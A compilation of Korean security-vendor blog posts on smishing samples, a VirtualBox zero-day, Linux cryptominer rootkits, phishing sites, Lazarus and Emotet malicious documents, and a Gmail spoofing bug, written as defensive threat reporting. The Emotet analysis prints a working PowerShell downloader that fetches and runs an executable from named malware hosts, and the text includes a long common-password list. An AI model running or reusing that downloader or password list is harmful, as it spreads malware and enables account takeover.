[11월 둘째주] 알약 스미싱 알림

 

본 포스트는 알약M 사용자 분들이 ‘신고하기’ 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 ‘특이 문자’를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다.

특이 문자 

 No.

문자 내용 

1

 너의 성적인 사진이 있으니 클릭하게끔 유도하는 문자

 2

 [Web발신] 11월11일/오후5시/라루체호텔/헤이스룸 [Web발신] ♣an eternal promise♣ 11.11(일).PM5시{포시즌호텔3층}

 3

 [Web발신] Cj대한통운 운송장번호[3209224154]  주문하신 상품이 발송 되었습니다

 4

 [Web발신][CJ대한통운]나기은11월07일택배주소를찾을수없음주소변경

Researcher discloses VirtualBox Zero-Day without reporting it to Oracle

보안 연구원인 Sergey Zelenyuk이 오라클의 VirtualBox 가상화 소프트웨어의 제로데이 취약점에 대한 세부사항을 공개했습니다. 이 취약점은 공격자가 게스트에서 호스트로 탈출하는데 악용될 수 있습니다.

Zelenyuk은 오라클의 패치를 기다리지 않고 이 취약점을 대중에 공개했습니다. 이유는 현대 정보 보안의 상태, 특히 보안 연구 및 버그바운티 쪽의 의견에 동의하지 않기 때문이라고 밝혔습니다.

이 취약점은 VirtualBox 5.2.20 및 이전 버전에 영향을 미치며, 모든 호스트 또는 게스트 OS에서 악용될 수 있습니다.

Zelenyuk은 디폴트 설정에서 동작하는 익스플로잇 코드를 개발했습니다. 유일한 요구사항은 네트워크 카드가 Intel PRO/1000 MT Desktop (82540EM)이어야 하며, NAT 모드여야 한다는 것입니다.

그는 Ubuntu 16.04 및 18.04 x86-64 guest에서 이 익스플로잇을 성공적으로 테스트 했습니다. 하지만 그는 이 코드가 윈도우에서도 작동할 것이라 추측했습니다.

이 취약점의 근본적인 원인은 메모리 충돌 버그입니다. 이는 루트 또는 관리자 권한을 가진 공격자가 guest에서 host ring3으로 탈출하는데 악용될 수 있습니다. 그런 다음, 공격자는 기존 테크닉을 사용해 /dev/vboxdrv를 통해 ring0으로 권한을 상승시킬 수 있습니다.

“이 익스플로잇은 리눅스 커널 모듈(LKM)으로 guest OS에 로드됩니다. 윈도우의 경우 초기화 래퍼와 커널 API 호출을 통한, LKM과 다른 드라이버가 필요할 뿐입니다.

“양쪽 OS 모두에서 드라이버를 로드하기 위해서는 상승 된 권한이 필요합니다. 이는 흔한 일이며, 극복이 불가능한 장애물로 간주 되지 않습니다. Pwn2Own 콘테스트에서, 연구원들은 익스플로잇 체인을 사용합니다. Guest OS에서 악성 웹사이트를 오픈한 브라우저를 악용하고, guestOS의 하이퍼바이저에서 공격하는데 필요한 ring0에 도달하기 위해 OS 취약점도 악용 되었습니다. 가장 강력한 하이퍼바이저 취약점들은 guest ring 3에서도 악용이 가능합니다. VirtualBox 또한 guest root 권한 없이도 도달이 가능한 코드였으며, 대부분 여기에 대한 감사가 이루어지지 않았습니다.”

이 연구원은 문제를 완화 시키기 위해 사용자들에게 가상 머신의 네트워크 카드를 AMD PCnet 또는 반가상화 된 네트워크 어댑터로 변경하거나, NAT의 사용을 피하라고 조언했습니다.

출처 :

https://securityaffairs.co/wordpress/77771/hacking/virtualbox-zero-day.html

Linux CryptoMiners Are Now Using Rootkits to Stay Hidden

가상화폐의 인기가 상승함에 따라, 더 많은 크립토마이너 트로이목마가 제작 되어 배포 되고 있습니다. 하지만, 크립토마이너의 문제는 과도한 CPU 활용으로 인해 해당 프로세스의 탐지가 쉽다는 것입니다.

새로이 발견 된 리눅스용 변종은 루트킷은 모든 CPU를 활용하는 크립토마이너 프로세스의 탐지를 어렵게 하기 위해 그의 존재를 숨기려 시도합니다.

TrendMicro의 새로운 보고서에 따르면, 이 크립토마이너+루트킷 조합은 높은 CPU 활용으로 인해 여전히 성능 이슈를 일으킵니다. 하지만 관리자들은 어떤 프로세스가 이를 일으키는지 찾아낼 수 없게 됩니다.

“우리는 최근 리눅스 시스템에 영향을 미치는 가상 화폐 채굴 악성 코드(Coinminer.Linux.KORKERDS.AB로 탐지함)를 발견했습니다.”

“이는 모니터링 툴에서 악성 프로세스의 존재를 숨기는 루트킷 컴포넌트(Rootkit.Linux.KORKERDS.AA)와 함께 번들로 제공된다는 점이 인상적입니다. 이로써 감염 된 시스템은 성능 문제만을 표시하게 되어 탐지가 어렵게 됩니다. 이 악성코드는 자기자신과 설정파일을 업데이트 및 업그레이드하는 것도 가능합니다.”

어떤 소프트웨어가 이 마이너를 설치하는지는 아직까지 알려지지 않았지만, 연구원들은 비공식 또는 미디어 스트리밍 소프트웨어와 같은 해킹 된 플러그인일 것으로 의심하고 있습니다.

일단 설치 되면, 실행 파일이 다운로드 되며 마이너를 설치하고 이 마이너의 존재를 숨기는 루트킷을 설치하는 일련의 쉘 스크립트를 실행할 것입니다. 

<출처: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth>

TrendMicro가 탐지한 변종은 크립토마이너가 /tmp/kworkerds에서 설치 및 실행 됩니다. 루트킷이 설치 되지 않은 경우, kworkerds 프로세스가 100% CPU를 활용하고 있는 것을 확인할 수 있습니다.

윗부분에 해당 마이너 프로세스가 CPU의 100%를 활용하는 것을 볼 수 있습니다.

<출처: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth>

하지만 루트킷이 설치 되면, 시스템 전체 활용도는 100%로 나타나고 있는 상태에서도 해당 프로세스는 보이지 않습니다.

[루트킷이 마이너 프로세스를 숨긴 후]

<출처: https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth>

위에서 확인할 수 있듯, 크립토마이너를 숨기기 위해 루트킷을 활용하는 방법은 탐지를 피하는데 매우 유용합니다. 하지만, 시스템 관리자나 컴퓨터의 지연 발생 원인을 파악할 수 없는 사용자들에게는 매우 끔찍한 일일 것입니다.

출처:

https://www.bleepingcomputer.com/news/security/linux-cryptominers-are-now-using-rootkits-to-stay-hidden/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다.



최근 계정 서비스가 보안상으로 잠겨서 로그인을 통해 신원정보 하라는 악성 피싱 메일이 발견되어 주의를 당부드립니다.

 

본 메일은 마지막 경고제목으로
전파되고 있으며
, 보안상의 이유로 사용자 계정 서비스를 처리 할 수 없고 포털 사이트의 모든 서비스가
일시 중지 된다고 사용자를 속입니다.

이후 신원정보를 위해 제작자가 만들어 둔 피싱 사이트에 로그인을 하도록 사용자들의 클릭을 유도 합니다.

[그림 1] 피싱 사이트가 포한 된 메일 본문

 

사용자가 로그인을 위해 클릭 하는 순간 국내 포탈 피싱 사이트로 연결됩니다

[그림 2] 다음 메일 피싱 사이트

 

사용자가 신원 정보를 확인하기 위해 해당 페이지에 계정 정보를 입력한다면입력한 개인정보는 모두 제작자에게 넘어가게 됩니다.

[그림 3] 사용자 계정정보 전송 화면

 

개인정보를 수집하는 코드를 살펴보면사용자가 입력한 ID, Password를 수집하며 추가적으로 사용자의 IP주소를 수집하여 특정 메일로 전송 하는 것을 알 수 있다.

[그림 4] 사용자 계정정보 수집 코드

 

본 메일에 기재 된 사이트를 분석 중 제작자의 피싱 사이트 리스트를 확인 하였으며 다음(Daum)뿐만 아니라 마이크로 소프트 핫메일(Hot Mail)도 추가적으로 발견되었습니다.

[그림 5] 마이크로소프트 핫메일 피싱 사이트 화면

 

 

사용자 여러분들께서는 의심스러운 링크의 클릭을 지양하시고로그인 할 때에는 반드시 해당 URL을 확인하는 습관을 길러야 합니다

[그림 6] 바이러스토탈 피싱 사이트 탐지 화면

 

해당 피싱 사이트에 대한 더 자세한 정보는 Threat
Inside
에서 확인하실 수 있습니다.

[11월 셋째주] 알약 스미싱 알림

 

본 포스트는 알약M 사용자 분들이 ‘신고하기’ 기능을 통해 알약으로 신고해 주신 스미싱 내역 중 ‘특이 문자’를 자체 수집, 집계하여 제공해 드리는 정보성 포스트입니다.

특이 문자 

 No.

문자 내용 

1

 [Web발신][CJ대한통운]운송장번호[96251**] 주소지 재확인 요청드립니다

 2

 {꽃처럼예쁘게}잘살겠습니다일시:11월16일오후2시장소:

 3

 [Web발신][CJ대한통운]현상윤11월13일택배주소를찾을수없음주소변경

 4

 [Web발신][CJ대한통운]김태훈주소가 틀렸습니다.문자로 확인하십시오.

‘1234567890’, ‘gfhjkm’, ‘ghbdtn’, ‘billgates’, ‘gates’, ‘mustdie’, ‘windows’, ‘hotdog’, ‘prayer’, ‘stella’, ‘cassie’, ‘kitten’, ‘danielle’, ‘jasper’, ‘hallo’, ‘112233’, ‘saved’, ‘dexter’, ‘hardcore’, ‘angel1’, ‘55555’, ‘chelsea’, ‘qwert’, ‘prince’, ‘blabla’, ‘red123’, ‘baby’, ‘1q2w3e4r’, ‘john’, ‘jason’, ‘maxwell’, ‘sammy’, ‘fuckoff’, ‘scooby’, ’emmanuel’, ‘nathan’, ‘loving’, ‘football1’, ‘ilovegod’, ‘jordan23’, ‘cocacola’, ‘11111111’, ‘bubbles’, ‘222222’, ‘microsoft’, ‘none’, ‘destiny’, ‘friend’, ‘church’, ‘mylove’, ‘david’, ‘onelove’, ‘maverick’, ‘testtest’, ‘green’, ‘dallas’, ‘mike’, ‘samuel’, ‘zxcvbnm’, ‘praise’, ‘wisdom’, ‘slayer’, ‘rotimi’, ‘adidas’, ‘foobar’, ‘creative’, ‘qwerty1’, ‘knight’, ‘genesis’, ‘viper’, ‘1q2w3e’, ‘iloveyou!’, ‘benjamin’, ‘power’, ‘hockey’, ‘corvette’, ‘anthony’, ‘enter’, ‘bandit’, ‘spirit’, ‘thunder’, ‘digital’, ‘lucky’, ‘joseph’, ‘7777’, ‘smokey’, ‘harley’, ‘looking’, ‘nintendo’, ‘shalom’, ‘hope’, ‘friends’, ‘google’, ‘merlin’, ‘admin’, ‘sparky’, ‘austin’, ‘passw0rd’, ‘chris’, ‘junior’, ‘chicken’, ‘123abc’, ‘online’, ‘trinity’, ‘maggie’, ‘winner’, ‘george’, ‘startrek’, ‘123321’, ‘123qwe’, ‘london’, ‘victory’, ‘asdfasdf’, ‘james’, ‘banana’, ‘scooter’, ‘flower’, ‘cool’, ‘peaches’, ‘blink182’, ‘richard’, ‘john316’, ‘forum’, ‘taylor’, ‘diamond’, ‘compaq’, ‘samantha’, ‘dakota’, ’eminem’, ‘hello1’, ‘biteme’, ‘mickey’, ‘soccer1’, ‘bailey’, ‘cookie’, ‘batman’, ‘peanut’, ‘guitar’, ‘rainbow’, ‘rachel’, ‘asdfgh’, ‘forever’, ‘robert’, ‘silver’, ‘canada’, ‘matthew’, ‘myspace1’, ‘blahblah’, ‘blessing’, ‘poop’, ‘hahaha’, ‘asshole’, ‘fuckyou1’, ‘gateway’, ‘muffin’, ‘666666’, ‘nicole’, ‘iloveyou2’, ‘william’, ‘grace’, ‘secret’, ‘peace’, ‘michelle’, ‘apple’, ‘testing’, ‘orange’, ‘jasmine’, ‘justin’, ‘helpme’, ‘mustang’, ‘11111’, ‘iloveyou1’, ‘pokemon’, ‘welcome’, ‘jessica’, ‘snoopy’, ‘mother’, ‘ginger’, ‘nothing’, ‘amanda’, ‘654321’, ‘aaaaaa’, ‘pass’, ‘matrix’, ‘happy’, ‘qazwsx’, ‘hannah’, ‘single’, ‘jennifer’, ‘1111’, ‘daniel’, ‘charlie’, ‘angels’, ‘thomas’, ‘andrew’, ‘lovely’, ‘hunter’, ‘7777777’, ‘pepper’, ‘heaven’, ‘buster’, ‘ashley’, ‘summer’, ‘faith’, ‘jordan’, ‘purple’, ‘000000’, ‘starwars’, ‘baseball’, ‘blessed’, ‘fuckyou’, ‘joshua’, ‘internet’, ‘cheese’, ‘michael’, ‘superman’, ‘soccer’, ‘asdf’, ‘killer’, ‘freedom’, ‘whatever’, ‘123123’, ‘jesus1’, ‘angel’, ‘football’, ‘tigger’, ‘princess’, ‘computer’, ‘master’, ‘sunshine’, ‘christ’, ‘123456789’, ‘shadow’, ‘1234567’, ‘iloveyou’, ‘111111’, ‘trustno1’, ‘dragon’, ‘monkey’, ‘hello’, ‘password1’, ‘love’, ‘test’, ‘letmein’, ‘abc123’, ‘1234’, ‘12345678’, ‘jesus’, ‘12345’, ‘qwerty’, ‘phpbb’, ‘password’, ‘123456’

안녕하세요. 이스트시큐리티 사이버 위협 인텔리전스(CTI) 전문조직인 시큐리티대응센터 (이하 ESRC) 입니다.

특정 정부가 배후에 있는것으로 알려져 있는 국가기반 해킹그룹 일명 ‘라자루스(Lazarus)’는 지난 03월 해외의 암호화폐 거래소 및 핀테크 관련 회사를 공격시도했던 것으로 알려져 있습니다.

당시 사용한 악성파일은 MS Word 문서포맷에 악성 매크로(Macro)코드를 삽입한 형태이며, 미끼(Decoy)파일 내용으로는 마치 암호화폐 거래 및 핀테크 관련 내용의 투자 제안서로 위장하고 있었습니다.

[그림 1] 투자 제안서로 위장한 악성 DOC 문서 실행 화면

한편, ESRC에서는 2018년 11월 유사한 공격사례를 추가로 포착해 위협 인텔리전스 기반의 추적조사를 계속 진행하고 있습니다.

공격자는 2018년 10월 말경 악성 DOC 문서를 제작했는데, 주로 해외를 공격하고 있는 것으로 추정되며, 2개 이상의 공격 정황이 포착되고 있습니다.

일부 파일은 남아프리카 공화국에서 보고되었는데, 최근 US-CERT 에서 공개했던 ‘HIDDEN COBRA – FASTCash Campaign’ ATM 공격 파일이 나이지리아, 케냐, 남아프리카 공화국 등에서 주로 보고된 이력과 유사합니다.

한편, 해당 위협을 조사하던 중 백도어(RAT) 기능을 수행하는 바이너리(EXE) 시리즈가 하나 발견됐고, 한국시간 기준으로 2018년 11월 07일 제작된 것으로 확인된 상태입니다.

2018년 02월 발견된 바 있는 유사 시리즈와 코드 구조가 일치하는 것으로 분석됐습니다.

이번에 발견된 악성 문서 파일의 경우, 실행될 경우 다음과 같이 매크로를 실행하도록 유도하는 영문 문구로 이용자를 현혹하고 있습니다.

[그림 2] 매크로 실행을 유도하는 악성 문서 화면

매크로가 실행되기 전까진 악의적인 기능이 대기상태이며, 오피스 버전 문제로 인해 매크로를 실행하도록 유도하는 영문 내용이 보여지게 됩니다.

매크로 코드는 특정 웹 사이트로 접속해 추가 악성파일을 설치하는 명령을 수행합니다.

DOC 문서는 영문내용을 가지고 있어, 주로 영어권에 있는 사람을 공격하기 위해 만든 것으로 추정되지만, 내부 코드를 분석해 보면 문서의 코드 페이지가 949′ 값으로 설정되어 있습니다.

악성 파일 제작자가 영어 문구를 사용해 공격을 수행했지만, 코드 페이지가 949라는 점은 한글 기반의 환경에서 제작했을 가능성이 높다는 근거 중 하나로 볼 수 있습니다.

[그림 3] 코드페이지(949)가 한국어로 설정되어 있는 화면

이와 별개로 명령 제어(C2) 서버와 통신을 시도하는 에이전트 경우 2018년 02월 14일 제작된 시리즈와 함수 실행 구조가 거의 동일하며, C2 주소가 일부 변경되었습니다.

ESRC 악성코드 분석 전문가들은 해당 DOC 악성문서와 EXE 연관성을 지속적으로 조사하고 있으며, 공격자는 코드의 다양한 부분에서 꾸준히 재활용하고 있지만, 나름대로 보안 회피 노력도 수행하고 있는 것으로 보고 있습니다.

[그림 4] Lazarus 유사 변종 함수 비교 화면

악성코드는 4개의 명령제어(C2) 서버와 통신을 시도하고, 2개의 한국(KR), 2개의 미국(US) 아이피를 사용합니다.

특히, 윈도우 서버로 구성된 미국(US)소재 일부 명령제어(C2) IP주소의 경우 명령제어 서버 기능 뿐만 아니라, 악성 파일 유포지로도 함께 활용이 되고 있는 것이 확인되었습니다.

또한, 내부적으로 사용하는 암호화된 코드의 복호화 루틴 역시 2018년 02월 경 해외의 공격에서 발견된 흐름과 동일하다는 것을 알 수 있습니다.

[그림 5] 복호화 루틴 코드 비교 화면

RAT(Remote Administration Tool) 기능을 수행하는 악성파일은 다양한 함수명령에 따라 컴퓨터의 정보를 수집합니다. 수집된 정보는 C2서버로 전송되고, 서버로 부터 추가 파일을 다운로드할 수도 있습니다.

ESRC에서는 보다 상세한 분석 내용과 침해지표(IoC) 자료를 준비해 Threat Inside’ 서비스를 통해 제공할 예정입니다.

최근까지도 정부지원을 받는 것으로 추정되는 APT 공격그룹(state-sponsored actor)의 활동이 매우 활발히 전개되고 있다는 점에 각별한 주의가 필요합니다.

이스트시큐리티 대응센터(ESRC)는 국가기반 사이버 위협그룹에 대한 체계적인 인텔리전스 연구와 추적을 통해, 유사 보안위협으로 인한 노출을 미연에 예방하고, 피해가 최소화될 수 있도록 관련 보안 모니터링을 강화하고 있습니다.

US Government is asking allies to ban Huawei equipment

Wall Street Journal에 따르면, 미 정부가 동맹국들에게 중요 인프라 및 5G 아키텍쳐에 화웨이 장비를 사용하지 말 것을 촉구하고 있는 것으로 나타났습니다.

미국은 화웨이 장비를 사용할 경우 겪게 될 국가 안보에 대한 위험을 강조하고, 인터넷 제공 업체들과 통신사들에 화웨이 장비 사용을 금지할 것을 권고했습니다.

중국산 장비들은 독일, 이탈리아, 일본 등 많은 미국의 동맹국들에서 사용 되고 있습니다.

많은 국가들은 5G 인프라를 구축할 예정이지만, 정부들의 접근은 완전히 다릅니다. 이탈리아의 정치인들은 국가 성장 및 국가 보안의 잠재적 효과를 위한 5G 인프라 구축을 완전히 무시할 것으로 보이며, 독일의 고위 관리들은 국가 안보의 잠재적 위협을 염려하여 화웨이와 같은 중국 회사들을 입찰에서 제외할 예정입니다.

Wall Street Journal에 따르면, 미 정부는 중국제 장비를 이용하지 않는 국가의 통신사들에게 재정적 지원을 할 예정입니다.

5G용 장비 입찰에 중국제 장비를 금지한 국가는 독일 뿐만이 아닙니다. 호주와 미국은 이미 같은 선택을 할 것을 발표했습니다.

화웨이는 늘 중국 정보국과는 아무런 관계가 없다고 밝혀왔습니다.

미 정부는 독일, 이탈리아, 일본 등을 포함한 미군 기지가 있는 국가들에서 중국제 통신 장비를 사용하는 것을 우려하고 있습니다.

 출처 : 

https://securityaffairs.co/wordpress/78373/intelligence/usa-allies-ban-huawei.html

안녕하세요이스트시큐리티 시큐리티대응센터(ESRC)입니다.

 

매크로를 이용한 송장 관련 악성 메일이 국내에 유포되고 있어 주의를 당부 드립니다.

※ 관련글 보기

 

▶ Trojan.Agent.Emotet 악성코드 분석 보고서

▶ [업데이트][주의] 견적서를 위장한 악성메일 지속적으로 유포중! 사용자들의 주의 필요

▶ 특정 기업의 프로젝트 파일처럼 위장한 악성 메일 유포 주의

▶ 국내 실제 기업명을 사칭한 악성 메일 유포 주의

 

이번에 발견된 악성 메일은 ‘INVOICE
#00U9404
’ 라는 제목으로 메일 본문에는 ‘Please find attached copy of
your latest invoice’
라는 내용으로 첨부된 파일의 실행을 유도합니다.
 

[그림 1] 수신된 메일

 

이용자가 첨부 파일 ‘Invoice_no_U9404.doc’
클릭할 경우 아래와 같이 매크로 실행을 유도 합니다
.  

[그림 2] 매크로 실행을 유도하는
DOC 파일

 

만약 이용자가 송장에
대한
자세한 정보를 열람하기 위해 매크로를 실행할 경우,

난독화된
스크립트를 이용해 
cmd.exe 프로세스를 실행하고, cmd.exe 프로세스는
powershell.exe 프로세스를 이용해 스크립트를 실행합니다.
 

[그림 3] 난독화 된 스크립트
실행 트리

 

스크립트는 공격자가 접속
가능한
C&C 서버를 조회하면서 EMOTET 악성코드
파일을 다운로드 합니다
. 분석 시에는 ‘http://vovsigorta.com’
사이트에 접속 후 %TEMP% 하위 경로에 ‘mjY.exe’라는
이름으로 파일 다운로드 및 실행을 하였습니다
.

 powershell  $IMF=’ppH’;$lFd=’http://vovsigorta.com/[email protected]://www.greenboxmedia.center/[email protected]://ghisep.org/img/jKX2btFw

@http://hgfitness.info/[email protected]://juegosaleo.com/TX9YrE9bp’.Split(‘@’);$fpj=([System.IO.Path]::GetTempPath()+’mjY.exe’);$jZC
=New-Object -com ‘msxml2.xmlhttp’;$pFS = New-Object -com
‘adodb.stream’;foreach($aXM in
$lFd){try{$jZC.open(‘GET’,$aXM,0);$jZC.send();$pFS.open();$pFS.type =
1;$pFS.write($jZC.responseBody);$pFS.savetofile($fpj);Start-Process
$fpj;break}catch{}} 

[ 1] 실행되는 스크립트

 

다운로드 된 악성코드는
사용자로부터 의심을 피하기 위해
‘C:WindowsSystem32tlntasp.exe’ 경로에
자가 복제를 한 후 사용자
PC 시스템 정보(프로세스 목록, OS버전, 아키텍처)
수집하고
C&C(millcreek.cc:7080) 서버로 전송합니다.

 

따라서 출처가 불분명한 메일에 있는 첨부파일 혹은 링크에 대해 접근을
삼가하시고
, 검증되지 않은 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부 검사를 수행해주시기
바랍니다
.

 

현재 알약에서는 관련 샘플을 Trojan.Agent.Emotet
으로 진단하고 있습니다.

Gmail Glitch Enables Anonymous Messages in Phishing Attacks

Gmail의 UX에 존재하는 오류로 인해 “발신인” 부분이 위조 되어 발신인 칸에 아무런 이름이 표시 되지 않는 이메일을 작성할 수 있었습니다.

이 트릭은 공식적인 경고문이나 시스템 메시지로 위장한 피싱 공격 시 무기화 되어 사용될 수 있었습니다.

소프트웨어 개발자인 Tim Cotten은 지난 금요일 Gmail의 UX에 존재하는 결점으로 인해 “발신인” 필드가 위장 되어 발신인이 없는 “유령” 이메일이 발송될 수 있다고 밝혔습니다.

<이미지 출처 : https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/>

Cotten은 이 트릭을 위해서 수신인의 이메일을 “발신인” 헤더(“name, recipient_email_here”)에 입력하고 <object>, <script>, <img>등과 같은 임의 태그와 연결했습니다.

그는 “잘못 된 형식의 이미지를 앞 필드에 삽입하면, 이메일의 송신자가 빈칸 형태로 표시될 것입니다.”고 밝혔습니다.

이 이메일을 수신하면, 송신인은 빈칸으로 표시 되며 “답장” 버튼을 눌러도 송신인의 이름이 표시 되지 않았습니다.

이메일 메시지의 “원본 표시” 파라미터 (이메일의 드롭 다운 태그를 통해 접근 가능) 아래에도 보낸 이의 이름을 볼 수 없었습니다.

실제 텍스트 아래에, <img> 태그를 사용한 뜻을 알 수 없는 테스트 케이스만 보일 뿐이었습니다.

“이는 따옴표를 붙인 별칭, 선생 된 단어, 공백 및 긴 base 64, 잘못 인코딩 된 img 태그의 조합이었습니다.”

“헤더 자체는 구글에서 보존 및 파싱했지만, UX는 이를 처리할 수 없었습니다.”

이 Gmail 오류는 무해한 것으로 보이지만, 공식 경고 메시지나 시스템 메시지로 위장한 피싱 메일을 작성하는 공격자들은 이를 유용하게 사용할 수 있습니다.

<스푸핑 된 ghost 이메일>>

<이미지 출처 : https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/>

“발신자 정보가 표시 되지 않을 경우, 이메일은 완전히 합법적으로 보이기 쉽습니다. 잘 교육 된 사용자들도 이에 속아 넘어가 계정이 해킹될 수 있습니다.”

Cotten은 이 Gmail의 취약점을 구글에 제보했으나, 구글은 아직까지 아무런 답변이 없었으며 버그를 수정하지도 않은 상태입니다.

출처 :

https://threatpost.com/gmail-glitch-enables-anonymous-messages-in-phishing-attacks/139247/